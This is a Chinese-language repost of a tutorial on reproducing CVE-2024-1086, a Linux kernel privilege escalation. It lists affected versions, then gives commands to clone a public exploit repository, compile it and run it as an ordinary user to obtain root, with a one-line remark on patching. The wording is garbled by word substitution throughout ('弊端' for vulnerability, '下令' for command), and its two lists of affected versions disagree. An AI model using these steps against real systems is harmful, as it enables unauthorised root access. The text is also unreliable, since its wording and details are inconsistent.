【弊端复现】(CVE-2024-1086)Linux内核中提权弊端CVE-2024-1086
## 影响范围以下版本的Linux内核受该弊端影响:
- 3.15 <= Linux kernel < 6.1.76
- 5.2 <= Linux kernel < 6.6.15
- 6.7 <= Linux kernel < 6.7.3
- 6.8:rc1 = Linux kernel
该弊端不适用于内核配置 `CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y` 且 Linux 内核版本 > 6.4 的系统。
## 查抄是否受弊端影响
### 1. 查抄当前Linux内核版本
在终端运行以下下令,查看当前内核版本:
uname -a
该弊端影响了使用Linux内核版本v5.14 - v6.6 版本(不包括分支修补版本 v5.15.149、v6.1.76和v6.6.15)的大多数 Linux系统/内核,包括CentOS、Debian、Ubuntu和 KernelCTF等
根本上2023前或者2023的都存在
弊端使用
切换成普通用户一步步来就可以
su 用户名字
#拉取项目并编译
git clone https://github.com/Notselwyn/CVE-2024-1086
cd CVE-2024-1086
make
#然后运行
./exploit make不肯定要全部成功只要生成exploit就可以
https://img-blog.csdnimg.cn/direct/f181165a431745c4bde597ac77f39abb.png
我这里下载好了
https://img-blog.csdnimg.cn/direct/5c420b012dd54202aad55b49e21d8361.png
直接执行就可以了
./exploit
可以看到执行id下令后
https://img-blog.csdnimg.cn/direct/a1f2807d212045159aa2329263e4e07a.png
弊端修复
更新Linux内核
根据差别的Linux发行版,接纳相应的内核更新步骤。
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]